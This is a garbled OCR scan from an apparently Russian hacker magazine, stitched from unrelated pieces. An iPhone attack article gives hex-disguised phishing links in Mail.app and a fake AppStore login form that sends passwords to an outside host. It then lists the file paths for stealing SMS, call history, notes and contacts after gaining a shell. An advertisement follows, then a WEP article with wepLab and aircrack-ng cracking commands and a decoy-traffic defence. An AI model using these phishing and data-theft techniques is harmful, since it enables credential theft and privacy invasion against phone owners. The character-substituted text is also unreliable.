оркітІ 2 е(і апсі кезкесі Іог 2.1 апсі 2.2, геЬиіІсіз іпзСаІІесі 
аррз оп кке 11у, зиррогкз ргохіез, Ьиа зсгірСіпд Іапдиаде 
апсі тоге ! 

Еіпаі геіеазе. Іпсіисіез Епдіізк, Еиззіап апсі ІІкгапіап 
1 оса 1 І 2 акіопз . 

</зСгіпд> 

<кеу>ісоп</кеу> 

<зкгіпд>]ткЦр : //і . гірсіеѵ. сот/іпіо/ісопз/сот. гірсіеѵ. 
іпзСаІІ-4 . о .рпд</зСгіпд> 

<кеу>иг1</кеу> 

<зкгіпд>]ткЦр : //і . гірсіеѵ. сот/іпіо/сот. гірсіеѵ. іпзСаІІ- 
4 . 0-2 . 2 . р1ізк</з1ігіпд> 

</сііск> 



кССр : / /шш. іріюпеѵ\[ОГ1(і. са/ехріоікз/сгазк-ту-іркопе . 

Чтобы заставить жертву поверить в обновление приложения, испра- ксті 
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: / /шш . ірііопеѵ^огісі. са/ехріоіііз/ірііопе-сгазіі . ІіРтІ 



ильский эксперт, конечно, не сообщается, однако первое, что мне пришло 
на ум проверить, прочитав этот адвайс — обработку Ыті-тэгов в письмах на 
іРЬопе. Недолго думая, я отправил сам себе письмо в Ыті-формате: 

<а 1ігеР=}іССр: / /доодіе . ги>1іС1:р : / /уапсіех . ги</а> 

Открыв это сообщение через встроенный почтовый агенттелефона, я ни- 
чуть неуди вился. Ссылка называлась ЫірУ/ѵапбех. ГЦ .а переходила, каки 
положено, на ЬирУ/доодІе.ги . Самое интересное, что если послатье-таіі 
в формате обычного текста, со следующим содержанием: Ы:І:р://ѵапсІех. 
Ш. то визуально это сообщение от вышерассмотренного отличаться не 
будет. Сднако ссылки будут вести на разные сайты. Если подержать палец 
натакой ссылке высветится всплывающая подсказка, в которой будетсо- 
держаться адрес реального сайта. Недолго думая, я попробовал 

<а 1ігеР="%б8%74%74%70%ЗА%2Р%2Р%б7%бР%бР%б7%бС%б5%2Е%72 
%7 5" >1іССр: //уапсЗех. ги</а> 

и был разочарован — почтовый клиент такое парсить отказался, ссылка 
была неработоспособна. Со второй попытки получилось — я просто оста- 
вил директиву «Ьир://»: 

<а 1ігеР="}іЩ:р: //%б7%бР%бР%б7%бС%б5%2Е%72%75">1іи:р: // 
уапсЗех . ги</а> 

Это уже работало корректно, по нажатию на ссылку из письма открывался 
браузер с Гуглом. Всплывающее окно отображало хексы, а не явный вид 
урла. В дополнение ко всему я убедился, что почтовик не воспринимает 
атрибуты Ше и аІГ Подвиг израильского богоискателя был повторен, и я 
решил сделать стран и цу с формой, точно повторяющей диалогза проса па- 
рол я для АррІеЭЬгеіэтотдиалог всплывает постоя н но, па рол ьза писать не- 
льзя, поэтому пользователи уже на авто мате вбивают данные) и отправить 
ее внутри Ггате втеле письма. Я снял скриншотсоригинального диалога, 
распилил его на картинки и собрал в НТМГ-таблице. Верстка под Эаіагі 
оказаласьнеоченьпростой, но, всеже, результатвышел очень похожим на 
правду. Чтобы проверить его в работе, был написан простой скрипт: 

<?р1ір 

$РІЗІ1= ' 



Они прекрасно функционируют на последней (на момент написания ста- 
тьи) прошивке 2.2. 

Еще пару слов о шелл-кодах. Есть прекрасная статья на метаспоите 
[ бир://Ыод.і I. і_: ' II ■ пп/2007/09/гооІ:-5Ьеи-іп-ппѵ-роске1-спб-ппаѵЬе- 
ѵоигз.ЫтІ ). в которой подробно описываются многие аспекты безопас- 
ности яблочного телефона и процесс создания (а вернее, портирования) 
шелл-кода для іРЬопе. Рассказать об этом лучше, чем сделал Н.В.Мооге, 
у меня вряд ли получится, поэтому просто отправляю к первоисточнику. К 
слову, эта статья была написана аж 25 сентября 2007 года! Запасись кофе 
— чаем — сигаретами (нужное подчеркнуть) и приятного чтения. А если 
хватит сил и дерзости самому броситься искать новые дыры, рекомендую 
для начала проверить все найденныеуязвимости вЗаІагі. Что-то мне под- 
сказывает: не все из нихзакрыты в мобильной версии ;). 

Н АТАКА З.РІ5НІЫ6/Х55 

Привожу два типа атак вместе, и связано это с тем, что «так исторически 
сложилось»: сначала попалось сообщение об угрозе фишинга на іРЬопе, 
затем захотелось расширить изыскания до Х55. Ктомуже, ничего конкрет- 
ного по межсайтовому скриптингу я не получил, поэтому выделять в отде- 
льный раздел считаю нецелесообразным. Итак, начнем. Однажды жарким 
летним днем рассылка секлаба сообщила, что некий израильский эксперт 
Авив Рафф нашел уязвимость в клиенте электронной почты іРЬопе, которая 
позволяет маскировать ложные ссылки в письмах. Перейдя по совершенно 
корректной и известной на вид ссылке, пользователь попадает на сайт, где 
ему под разным соусом предлагается отправить какие-то личные данные. 
В общем, схема стандартная, теперь о реализации. Что там придумал изра- 



<1іЦт1> 

<Ьосіу Ьдсо1ог= "ѵ\[МЦе" > 

<Рогт те1:}іО(і= "СЕТ" асСіоп= "ЦРСр : //сгесііЦтпе . ги/х/:Е/ 
і.ріір" пате= " ПакеРогт" ісі= " РакеРогт" ѵ\?ісік}і="278"> 
<СаЫеЬог(іег= " О " зку1е= : 278рх; кеідкк : 175рх; расісііп 

д-кор : Орх; расісііпд-гідіік : Орх; райсііпд-іекк : Орх; райсііпд- 
ЬоккотгОрх" \л?ісік}і= " 27 8 " 1іеід}ік = " 17 5 " се11расісііпд= " О " 
се11зрасіпд= " О " > 

<кг "278 "> 

<к(і со1зрап="4"> 

<ітд згс= " ГІ1 . дік " ѵ\?ісік}і= " 27 8 " 1іеід}і1: = " 78 " /> 

</к(і> 

</кг> 

<кг ѵ^і(ік}і= " 2 7 8 " > 

<к(і ѵ\?і(ік]з= " 8 " со1зрап= " 1 " > 

<ітд згс= "г21 . дік " Ьогсіег= " О " " 8 " 1іеід}і1:= " 3 О " /> 

</к(і> 

<к(і со1зрап="2" \л?ісік}і= " О " > 

<іприк куре= "раззѵ^огсі" зку1е= : 2 62 ; кеідкк : 3 О " 

пате="кразз" ѵа1ие=""> 

</ксі> 

<к(і " 8 " со1зрап= " 1 " > 

<ітд згс="г23 .дік" зку1е= "тагдіп-іекк : -115рх" 
Ьогс3ег="0" " 8" кеід]Щ:= " 3 О " /> 

</к(і> 

</кг> 

<кг > 
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апсІ-ппаѵЬе-ѵоиг5. 
Ьіт[- адапта- 
ция МеІаЗрІоіІ; 
Ргатеѵѵогк к ОС 
іРЬопе. 



<?р1ір 

зеРсоокіе ( "изег " , "РезР", Ріте ( ) +3600) ; 
Рогеаск ($_СООКІЕ аз $соокіе_пате => $соокіе_ 
ѵаіие) { 

ргіпР("<1і>" . кртізресіаіскагз ( $соокіе_пате) 

. "=" . кртізресіаіскагз ( $соокіе_ѵа1ие) . "</ 
1і>") ; 

} 

ргіпР ( "<к2>зегѵег аггау : " ) ; 

$Ртр=Рореп ( " іркопе-таіі . РхР " , ) ; 

Рогеаск ( $_ЗЕКѴЕК аз $кеу_пате => $кеу_ѵа1ие) { 
РриРз($Ртр, $кеу_пате . " = " . $кеу_ѵа1ие 



хті , арр1ісаРіоп/хкРт1+хт1 , РехР/ 

крті ; р=0 . 9 , РехР/рІаіп; р=0 . 8 , ітаде/рпд , */ 

*;д=0.5 

НТТР_АССЕРТ_ЕАЕСЕАСЕ = ги 
НТТР_АССЕРТ_ЕЫСОВІЫС = дзір, кеРІаРе 
НТТР_СОЫЫЕСТІОЫ = кеер-аііѵе 
ЗЕКѴЕК_АВМІЫ = [по аккгезз діѵеп] 

КЕМОТЕ_РОКТ =6084 
ЗЕКѴЕК_РКОТОСОЕ = НТТР/1.1 
КЕ0ВЕЗТ_МЕТНОВ = СЕТ 
СВЕКУ_ЗТКІЫС = 
агдѵ = Аггау 
агдс = о 

В итоге, единственное, что удалось обнаружить — рекурсив- 
ное отображениетела письма, при конструкции 

<іРгате згс=/> 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно 
с целью ознаком- 
ления! Ни автор, ни 
редакция за твои 
действия ответствен- 
ности не несут! 



. "\П") ; 

ргіпР ( $кеу_пате . " = " . $кеу_ѵа1ие . 
" <Ьг> " ) ; 

} 

Рсіозе ( $Ртр) ; 
ргіпР ( "</к2>" ) ; 

?> 

Результаты были следующими — соокіез отключены, иденти- 
фикация браузера полностью аналогична веб-браузеру Заіагі: 

НТТР_ВЗЕК_АСЕВТ = Мо2І11а/5.0 (іРкопе; 

В; СРВ ІРкопе ОЗ 2_2 Ііке Мао ОЗ X; ги-ги) 
АррІеШеЬКіР/525 . 18 . 1 (КНТМЕ, Ііке Сеско) 
НТТР_АССЕРТ = РехР /хті , аррІісаРіоп/ 



почтовик несколько раз отрисовывает вложенные і[гате 
один в другой. При каких-то параметрах ѵѵіб1;Ь и ЬеідЫ; он 
зацикливается и рисует бесконечно долго. Разок я эти па- 
раметры угадал, но особого внимания не обратил. Исходник 
не сохранился, а воспроизвести заново уже не получилось. 
Но то, что проблема остается и параметр згс= (впрочем, как 
и любая конструкция згс= "ЫаЫаЫа" ) ссылается на этот 
же документ — очевидно. Обычно (в зависимости от осталь- 
ных тэгов страницы) отрисовывается 3-4 повтора. Конечно, 
бесконечное отображение это утечка памяти, но ее успеш- 
ный результат — всего лишь завершение работы почтовика. 
Кроме того, обнаружился приятный момент — недокументи- 
рованный и нклудин г документов прямо в тело письма. От- 
правляем Ы:пп[-письмо с іігате, ссылающимся на скрипт: 



► обо 
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<?р11р 

Ііеасіег ( ' СопРепР-Руре: арріісаріоп/ѵпсі.тз-ехсеі ' ) ; 

Ііеасіег ( ' СопРепР-ВізрозіРіоп: аРРасРітепР; 

Рі1епате= "сіоѵтіоасіесі.хіз " ' ) ; 

геасіРіІе ( ’хіз .хіз ' ) ; 

?> 

В итоге, получаем просмотр документов Р0Р/00С/Х15 пря- 
мо втеле письма в почтовике. Негусто! Последняя наработка 
— метатэги. Они в почтовике отрабатываются корректно, на- 
пример, можно сделать редирект: 

<теРа 1іРРр-едиіѵ= "КеРгезІі" сопРепР="1; 
иг1=1іРРр : / /уа . ги " > 

Если оставить параметр игі пустым, страница просто об- 
новится (а вернее — будет постоянно обновляться). Что ж, 
обзор атак подобного типа предлагаю завершить. В этой об- 
ласти еще предстоит трудиться и трудиться, чтобы получить 
хоть какие-нибудь результаты. 

Н АТАКА4.10САТІ0М5Р00РІМ6 
ИЛИ<<ПОТЕРЯЛАСЯЯ..>^ 

Эту атаку, судя по всему, придумали швейцарцы. Во всяком 
случае, они первые о ней написали. Теоретическая воз- 
можность была рассмотрена сильно раньше этой статьи, 
однако практическая реализация касательно іРбопе/іРоб 
принадлежит именно им. Вот ссылка на первоисточник: 
ѵѵѵѵѵѵ.зѵззес.сІі/ргезз/Іосабоп-зрооЕпд-аІІаскз-оп-іЬе-ірбопе- 
апб-іросі . Рекомендую ознакомиться, потому что заниматься 
переводом у меня нет никакого желания :). Если вкратце: Арріе 
іРЬопе 2д и Арріе іРоб ІоисЬ умеют определять свое местополо- 
жение в пространстве, основываясь на данных от 05М-вышек 
и уровне сигнала в ѴѴіЕі-сетях. Координаты ѴѴіЕі-точек доступа 
тягаются из базы Ыір://\ллллл/.зкѵЬоокѵѵіге[езз.сопп (собственно, 
почему им не пришло в голову с пуфить ответы этой самой базы). 
Поскольку в іРоб ІоисЬ никакого 05М-позиционирования быть 
не может, все сведения о н тя н ет от ѴѴіЕі -точек доступа. Спуфинг- 
атака заключается в том, что, имитируя такую же точку доступа, 
но расположенную ближе (уровень сигнала выше) или дальше 
(уровень сигнала ниже), можно ввести алгоритм в заблуждение. 
Никакой проверки подлинности, кроме МАК-адреса,там не пре- 
дусмотрено, так что это проще простого. Что же касается іРбопе 
2д, то здесь такая атака тоже имеет место, но с оговоркой на то, 
чтосначалаареалпребыванияустанавливается на основе 65М- 
сигнала. Если попытаться убедить устройство, что здесь ловится 
точка доступа, далекая от этого ареала, данные от такой точки в 
расчетбраться не будут. Таким образом, обманугьлокатор іРбопе 
можнотолько в пределах района, который позиционируетбЭМ. 

В ВЗГЛЯД ИЗНУТРИ. ЧЕМ ПОЖИВИТЬСЯ? 

Предположим, все уже позади: подошел дефолтный пароль 
или эксплоит открыл нам шелл. В общем, доступ к файловой 
системе получен, что дальше? Дальше — лови момент. Боль- 
шинство данныхна іРбопехранится внутри базыданныхздІТе. 
Каждое приложение (например, СМС-менеджер, почтовик, 
браузер и прочие) имеютсвой файликс базой, куда кладут все 
данные. Опишу структуру наиболее интересных баз: 
/ргіѵаЬе/ѵаг/тоЬі1е/ЬіЬгагу/Са1ІНізЬогу/са11_ 
ЬізЬогу.йЬ — записи о всехзвонках. Форматтаблицы саЕ: 

ЕОЖВ (порядковый номер) Іайсігезз ( телефонный номер ) ЩаТе (время 
звонка в абсолютном формате) ІбигаТіоп (длительность звонка в 
секундах) | Тіадз (еще не понял, зачем) | іб (ссылка на идентифи- 
катор контакта?). В таблице_5д[і1:еВа1;аЬа5еРгорегбе5 нахо- 
дятся настройки и общие сведения, например, общее время 



входящих/исходящих (і:іппег_ои1:доіпдЛіппег_іпсоппіпд). 
/ргіѵаЬе/ѵаг/тоЬіІе/ЬіЬгагу/ЫоЬез/поЬез .(ІЬ 

— заметки. Формат таблицы по1:е_Ьобіе5: посе_іб (поряд- 

ковый номер заметки) | баба (текст заметки в ббті формате, ко- 
дировка итР-8). Форматтаблицы Моіе: ЕОЖВ (порядковый но- 
мер заметки) I сгеабіоп_бабе (абсолютная дата создания) | бібіе 
(заголовок заметки) | зиттагу (первые символы текста 

заметки) | сопбаіпз_с ^к (зарезервировано?). 

/ргіѵаЬе/ѵаг/тоЬіІе/ЬіЬгагу/ЗМЗ/зтз .(ІЬ — СМС 

:). Формат таблицы теззаде: КОЖВІаббгезз (номер те- 
лефона отправителя) | бабе I бехб (текст сообщения в ІІТГ- 
8) I біадз I геріасе I зѵс_сепбег | дгоир_іб (идентификатор группы, 
в случае отправки нескольким адресатам в группе будут несколь- 
ко номеров) I аззосіабіоп_іб I ЬеідЬб I ВІРІадз I ѵегзіоп. ФормаТ 
таблицы ППЗд_дГ0ир: КОІлШВІбуре (резерв, всегда 0) I пеиезб_ 
теззаде (ІВ последнего сообщения) | ипгеаб_соипб (кол-во не- 
прочитанных). Эта таблица связывает группы адресатов и 
сообщения. Формат таблицы дгоир_тетЬег: кожвідгоир_ 

ібіаббгезз (номер телефона адресата) . Табл И ца СОДерЖИТ И Н- 

формацию о группах адресатов СМС. Если ты отправляешь 
СМС одному человеку — создается новая группа, с одним ад- 
ресатом, все сообщения от него ктебе и твои к нему записы- 
ваются с идентификатором этой группы. Если отправляешь 
нескольким — создается группа с несколькими адресатами, 
тогда один номер является участником нескольких групп в 
таблице. 

/ргіѵаЬе/ѵаг/тоЬі1е/ЬіЬгагу/Ѵ7еЬКіЬ/ВаЬаЬа8е8/ 
ВаЬаЬа8е8 .(ІЬ — здесь хранится информация о всех ба- 
зах данных, которые использует движок ѴѴеЬКіЕ Это поч- 
товые аккаунты. Форматтаблицы ОаІаЬазез: диібі огідіп 

(источник, в случае с почтой дтаіі — это Ьббр_таі1 . доодіе . 
сот_0) I пате (имя аккаунта СтаіІМоЬіІеМеЬ) I бізрІауЫате I е 
збітабебЗізе (размер базы в байтах) ІрабЬ. (имя базы дан- 
ных) . На основе данных из этой базы лезем в базы каждого 
аккаунта. Они расположены в директории /ргіѵаіе/ѵаг/ 
тоЬі[е/иЬгагу/ѴѴеЬКі1;/0а1;аЬазез/<огідіп из ОаІаЬазез. 
□а1:аЬазез>/<ра1:б из 0а1:аЬазез.0а1:аЬазез>. Рассмотре- 
ние внутренностей этих баз оставлю на самостоятельное 
изучение или для следующих статей. 
/ргіѵаЬе/ѵаг/тоЬі1е/ЬіЬгагу/Аса(аге88Воок/ 
А(а(а^е88Воок.8^1іЬебЬ и /ргіѵаЬе/ѵаг/тоЬіІе/ 
ЬіЬгагу/Аса(аге88Воок/А(а(аге88ВоокІтаде8 . адІіЬесіЬ 

— базы данных адресной книги (списка контактов). Здесь 
самая интересная таблица АВРегзоп. Формат: кожвірігзб 

(Имя) ІЬазб (Фамилия) ІМіббІе (Отчество) | ГігзбРбопебіс I Мібб 
ІеРЬопебіс I ЬазбРбіопебіс (не используются) | Огдапігабіоп | Ве 
рагбтепб I Ыобе I Кіпб I ВігбЬбау I ТоЬТібІе I Ыіскпате I Ргебіх | Зибб 
іх I РігзбЗогб I ВазбЗогб I СгеабіопВабе I МобібісабіопВабе I Сотро 
зібеЫатеРаІІЬаск | ЕхбегпаІІбепбібіег | ЗбогеІВ | ВізрІауЫате I Р 
ігзбЗогбЗесбіоп | ВазбЗогбЗесбіоп | РігзбЗогбВапдиадеІпбех | В 
азбЗогбЬапдиадеІпбех. РазумееТСЯ, боЛЬШИНСТВО ЭТИХ ПОЛеЙ 

пустые. Втораятаблица используется для хранения аватарок 
абонентов. Думаю, разберешься с ней без проблем. 

Н ЗАКЛЮЧЕНИЕ 

Это не конец — это только начало. Пройдет немного време- 
ни и атак станет существенно больше. Стимул изобретать их 
весьма велик: мобильный ботнет на базе мощных ипіх-гад- 
жетовсдвумя интерфейсами выхода в интернет! Количество 
атак на мобильные платформы растет пропорционально их 
распространенности и производительности. Арріе іРбопе 
на сегодня поэтим показателям явно лидер. Такчто, дерзай, 
надеюсь, почву для размышления я предоставил. Если по- 
явятся вопросы или идеи, — жду тебя в своем блоге: ЬФр:// 
охоб. ги. ^ 



взлом 




> СІѴСІ 

• Поддельную 
страницу логина 
АррІеЭіоге можно 
найти на диске. 

• Все рассмотренные 
эксплоиты есть 

на диске. 
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О ТТТТк 




ЕМТНиЗІАЗТ 

ІМТЕРМЕТ 

АѴѴАРО 

2008 



пшша 




$25000 



Самая денежная премия 
Рунета нашла победителей 

ПОДВЕДЕНЫ ИТОГИ ЕМТНОБІАЗТ ІЫТЕРЫЕТ АѴѴАРО 2008 



Третье место и ‘ виин,^ 

$Т0 000 -Павел мар 

^іСіАаи.ги. - 






26 февраля были подведены итоги 
второй всероссийской премии среди 
ѵѵеЬ-энтузиастов ЕпіИизіазІ; Іпіегпеі; 
Аѵѵагб 2008 (проводится медиакомпа- 
нией Оатеіапсі). Неторжественной 
церемонии в ресторане «Тинько 
были названы имена 11 победителей 
- создателей лучших «непрофессио- 
нальных» русскоязычных ѵѵеЬ- 
проектов и определены главные по- 
бедители конкурса, которые 
разделили призовой фонд в $50 000. 









проекта ІіГезІійев.ги Втоооо создатель 





Соодіе' 



РАДИО 

РВЕИИІ^^ 



@таІІги 




Победителями в 11 категориях 
по итогам всенародного открытого 
голосования и мнению жюри стали: 



«Цифровые технологии» - 
ѵѵѵѵѵѵ.ѵѵіЛ4аІІ.ги 



«Кино» - ѵѵѵѵ\л/.5іт-^иѣ.ги 




Реклама 



«Фото» - ѵѵѵѵѵѵ.іі^езіісіез.ги 



«Аудио» - ѵѵѵѵѵѵ.зЬкига.ги 
«Гейминг» - ѵѵѵѵѵѵ.Ьіпагіе$.ги 
«Дизайн» - ѵѵѵѵѵѵ.поѵаіе.ги 



«Бизнес» - ѵѵѵѵѵѵ.ИоЬіг.ги 
«Видео» - ѵѵѵѵѵѵ.оп-іѵ.ги 



Итоги второго конкурса ЕпІИизіазІ Іпіегпеі АѵѵагсІ показалИр что 
с каждым годом в Рунете становится все больше и больше ѵѵеЬ- 
энтузиастоВр наполняющих интернет-пространство качествен- 
ным любительским контентом. И все больший интерес и всеоб- 
щую поддержку подобные проекты вызывают среди обычных 
пользователей интернета. В течение 3 месяцеВр в которые про- 
ходил ЕпНіизіавІ Іпіегпеі АѵѵагсІ 2009р более 30 000 000 голосов 
было отдано за работы конкурсантов в ходе открытого всена- 
родного голосования на сайте премии. В конкурсе приняло уча- 
стие более 1300 работ. 

радЫр что нам удалось найти и поддержать действительно 
стоящие идеи в интернетОр проекты с огромным потенциалом. - 
комментирует управляющий директор медиакомпании 
Сатеіапсі Давид Шостак. 

Организатор ЕпНіизіавІ 1п(егпе( АѵѵагсІ 2008 ме- 
диакомпания Сатеіапсі поздравляет всех побе- 
дителей и благодарит за поддержку спонсоров 
премии: торговую марку Окііск (официальный 
спонсор категории ^<Гейминг^Ир компанию 
МІСГ050Н и информационных партнеров компа- Ш 
ниютаіі.гир официальную почтовую службу Н 
конкурса портал таіі.ги и Радио ^<Премиум^>. {■ . 1 



«Мода» - ѵѵѵѵѵѵ.рготізіпд.ги 



«Спорт» - ѵѵѵѵѵѵ.го5ѣоѵ$ка*ег.ги ^ 



«Авто» - ѵѵѵѵѵѵ.сІиЬѵоІѵо.ги 






іѵерІаЬ - 
Іозе 1§г 




ВЗЛОМ 



Мер Кеу Сгаскег (ѵО.1.5). 

гіп - Торо[ЬВ] <горо1Ь@и5ег8.5оигсе^ог§е.пе1:> 
Сгаскег ѵО.1.5 [0РТІ0М8] . . . РІЬЕ 



огтаШоп 



изаде: і< 

Орііопз: 

— (ІеЬид <йеЬи8Іеѵе1> ргіпіз йеЯ ЖогтаНіоп 

-V, — ѵегЬозе ргіпі: тоге іп^огтЛ М 

-у, — (Зісігіопагу <Л1е> изез могсЗ^^^хх*! з^йіп) аз мер кеуз 

-к, — кеу [64 1 128] зресі^іез 128 ог ййіййааа!і((3е?аи11:) кеу 

-Ь, — Ьги1:еРогсе <Л1е> Ьгиііе Гогсез мер кеуз 

-с, — саріиге саріиге епсгурііесі <іа1:а раскеіз 

-і, — іп^ег^асе ^ог сар1:игіп§ раске^з мі1:Ь — сарігиге 

-г, — Ьеигіз^ісз {^ііе изез меак кеуз апй іпіеііідепі: Ьгиге^огсе 

-а, — апаіузіз апаіуге ^ііе ап<3 §е1: Іііе з^аііізіісз 

-т, — тиИіргосезз <питЬег> Аззите <пишЬег> оР ргосеззез. МитЬег тизі Ье Ьеі 
мееп 1-64. ОеРаиІІ 1. 

— сЛ " ^ сарИигей раскеіз мі1;Н — саріиге (сІеСаи 

11 80) 1 * Л ■ Ц ■ 



11 80) 
—и 



— регс <питЬег> изез іЬіз тіпітип регсепіаке о1 зиссеес) мЬеп изіп§ РМ8 с 

гаскіпб НЕМНОГО О ТОМ, КАК МОЖНО ЗАПУТАТЬ ѴѴЕРЬАВ И АІРСРАСК 

— могйРіІе <Рі1е> іпзіеай о1 геасііпд могсіз Ігот зійіп І1 изез іНіз Іехі Рі 

1е аз 



Ты админ в среднестатистическом офисе с беспроводной сетью. Куча разно- 
шерстных клиентов, старое оборудование, почти полное отсутствие финан- 
сирования. Поддержка \ѴРА есть не везде... Короче, хватит жаловаться — ис- 
пользуешь ты старый и порванный со всех сторон ѴѴЕР! Ну что будешь делать, 
товарищ? Идея проста до безобразия — внедри в эфир специальный мусор- 
ный трафик с целью запутать хакера. 
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□ ак работают программы, которыми с большой вероятностью 
нас попытаются сломать? Самые популярные ѴѴЕР-кракеры 
— этоѵѵерІаЬ и аігсгаск. Перваяутилита — классический 
кракер со снифером, вторая же — полноценный комплекс для 
аудита с кучей алгоритмов, активными атаками и мощным функционалом. 
Обе программы работают под большинством СМІХ-систем. Более подроб- 
ное описание есть на сайтах производителей. Для дистрибутива ОеЬіап, 
каки для большинства других дистрибутивов, обе программы есть в репо- 
зиториях. Крометого, аігсгаск имеетсборку под ѴѴіпбоѵѵз, а ѵѵерІаЬ можно 
запустить и под Судѵѵіп. Вообразим себя на месте взломщика, который 
просканил нашу сеть. Что мы будем делать сначала? Правильно, собирать 
дампы. Бороться с избыточной зоной покрытия, конечно, надо, но не 
оченьэффективно в силу физики этого бренного мира. Рано или поздно 
взломщикполучитдамп. Заранее хакеро нашей сети ничего незнает— ни 
длины ключа, ни даже то, что мы используем лохматый ѴѴЕР. Рассмотрим 
поведение хакера при использовании каждой изэтихпрог. 



ѵ/ерІаЬ — Ь (іитр.рсар 

//Атака перебором 

саб зіоѵаг.бісб I ѵ^ерІаЬ — у битр . рсар 

//Атака по словарю 

\тер1аЬ — г битр.рсар 

//Эвристический метод 

Единственный перспективный метод — последний. Остальное долго 
и бесполезно. Скорее всего, просто осталось аппендиксом со времен, 
когда работы по статистическому анализу ѴѴЕР еще не были опубликова- 
ны. Теперь второй момент — как поведет себя программа, если в одном 
файле встретятся пакеты, зашифрованные разными ключами? Какой 
ключ подберется быстрее? Тот, которого найдено больше? А не будут л и 
те, «неверные» пакеты запутывать алгоритм кракера? Много вопросов? 
Попытаемся разобраться на деле. 

В ЗАПУТЫВАЕМ ѴѴЕРІАВ 



Н ЛОМАЕМ С ПОМОЩЬЮ ѴѴЕРІАВ 

Поумолчанию программа пытается сломать 64-битный ѴѴЕР-ключ. Работа 
со 128-битными ключами выставляется флагом — к 128. Очевидно, что для 
взлома 64-битного ключа надо гораздо меньше зашифрованных паке- 
тов, чем для 128-битного. Резонно сначала попробовать сломать в дампе 
64-битный КЛЮЧ: если он найден, врядли хакер будет пробовать искать еще 
какие-то ключи. Это на будущее. Программа знаеттри алгоритма взлома: 
прямой бругфорс (перебор ключей), атака пословарю и эвристический ана- 
лиз. Если не указывать мак-адресточки доступа, программа будет пытаться 
взломать первую попавшуюся последовательность. Команды выглядяттак: 



После ряда экспериментов, проб и ошибок, а также недолгого изучения 
исходников, которое я просто не в состоянии уже вспомнить, было выяв- 
лено следующее: программа очень плохо переносит коктейль изтрафика, 
зашифрованного разными ключами илитипами шифрования. Алгоритму 
для успешного взлома надо определенное количество идущих подряд 
пакетов ѴѴЕР. Получается, нам необходимо прямо противоположное 
— вещать через определенные интервалы времени ложный ѴѴЕР- или 
ѴѴРА-трафик! В моменты простоя сети, когда подключенных клиентов нет, 
можно посильнее разбрасыватьфейковый трафик в эфир. С содер- 
жанием можно не напрягаться — взломщикне станетанализировать 
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Использование этой 
идеи в коммерческих 
продуктах запреще- 
но. Если есть конк- 
ретные предложения 
— свяжись со мной. 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно 
с целью ознаком- 
ления! Ни автор, ни 
редакция за твои 
действия ответствен- 
ности не несут! 



каждый пакет. Подытожив все сказанное, заключаем: чтобы 
обмануть статистические алгоритмы ѵѵерІаЬ, надо преры- 
вать прямую последовательность «правильных» пакетов 
ложными. Максимальная длина прямой последовательнос- 
ти «правильных» пакетов должна быть меньше минималь- 
ного количества пакетов, необходимого для взлома ключа 
данной длины. Эта величина равна примерно 50.000 пакетов 
для 64-битного ключа и 200.000 пакетов — для 128-битного 
ключа, хотя цифры очень приблизительные. Програм- 
ма работаете высокой однозначностью: при повторных 
запусках результат не меняется (во всяком случае, я такого 
не наблюдал). Приготовив коктейль из настоящих 64-бит- 
ных ѴѴЕР-пакетов и ложных 128-битных в пропорции 10/1 
(20.000 настоящих, 2.000 ложных итак20 раз), я натравливал 



на полученный дамп ѵѵерІаЬ с различным порогом чувстви- 
тельности (опция --регс). На 80% я остановился в связи с 
большим временем работы программы (больше сутокдля 
100% на целероне 1 .4), нотакни разу неувидел взломанный 
ключ! Итак, у меня был дамп, состоящий из 400.000 пакетов 
64-битного ѴѴЕР, который не взламывался кракером ѵѵерІаЬ. 
Если бы я вырезал две прямые последовательности «пра- 
вильного»трафика руками, ключ бы был найден за 5 минут. 
Вторым и завершающим экспериментом стал коктейль из 
20 последовательностей 50.000 настоящих 128-битных ѴѴЕР 
и 5.000 ложныхѴѴРА. Подобноетоже оказалось не под силу 
ѵѵерсгаск. Хотя для взлома было бы достаточно 200.000 из 
этого миллиона, если бы они располагались другза другом. 
Результат получен довольно многообещающий! 
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интерактивном режиме Аігсгаск показывает, что сеть защищена ѴѴРА| 



<кеу> тизі: Ье іп гпе 



еу Іо ѵѵеріаь 1:о §а1:Пег іпгогтагіоп а 
іА:ВВ:СС:Ьо. . . апй тау Ье іпсотріеге. 



н ЛОМАЕМ с помощью ДтСРАСК 

Эта продвин^ая программа имеет в своем арсенале массуутилит. Я рас- 
смотрю пока только сам аігсгаск-пд. Программа умеетломать и ѴѴРА, и ѴѴЕР. 
При запуске без дополнительных параметров она показывает интерфейс с 
отображением всех МАС-адресовточекдоступа в дампе с их алгоритмами 
шифрования. Стоитли говорить, что этот режим — самый популярный среди 
молодежи?Теперь немного об опциях. Здесь просто море различных настроек 
ѵѵер-кракера. Если хочешь познакомиться со всеми современными методами 
взлома ѴѴЕР, просто прочитай мануал. Вкратце: программа знает две базовые 
атаки — РТѴѴ(Ру5І~ікіп,Теѵѵ5,ѴѴеіпппапп) и ЕМЗІЕІиЬгег, Мап1:іп,5Ьаппіг).0бе 
основаны на статистическом анализе. Вотпримеры использования: 

аігсгаск-пд сіитр.рсар 

/ /Интерактивный режим 
аігсгаск-пд — Ь 00:00:00:00:00:00 

//Подбор ключа к заданной точки доступа 

аігсгаск-пд — у 

//Атака по словарю 

Н ЗАПУТЫВАЕМ АІПСПАСК-Ы6 

Мое внимание сразу привлек метод автоматического определе- 
ния типа шифрования. Очень скоро была найдена обманка: если 
последние записанные пакеты зашифрованы ѴѴРА, аігсгаск оп- 
ределяеттип шифрования какѴѴРА, независимо оттого, сколько 
«правильных» ѴѴЕР-пакетов (или каких-либо других) было внача- 



ле. Я создал файл с 1.000.000 настоящих 1 28-битных ѴѴЕР-пакетов 
и хвостом из 1.000 ѴѴРА. Скормив это аігсгаск в интерактивном 
режиме, я с радостью обнаружил, что моя точка использует ѴѴРА. 
Естественно, через меню программы такой дамп взломать было 
невозможно. При этом, если руками задатьтип шифрования 
(аігсгаск-пд — а1 битр.рсар),то взлом будет успешным. Нельзя 
наверняка угадать, когда взломщик закончит снимать дамп, но 
такая обманка может использоваться в комплексе с другими. 
Всегда будет существовать вероятность, что хакеру не повезет — 
а это уже немало. Второй коктейль, который я приготовил, состоял 
из 450.000 пакетов 1 28-битного ѴѴЕР, зашифрованных настоящим 
ключом, и 200.000 пакетов, зашифрованных ложным 128-битным 
ѴѴЕР-ключом. Аігсгаск сразу нашел ложный ключ (ему просто хва- 
тило 200.000 ложных пакетов в хвосте). Для пущей уверенности я 
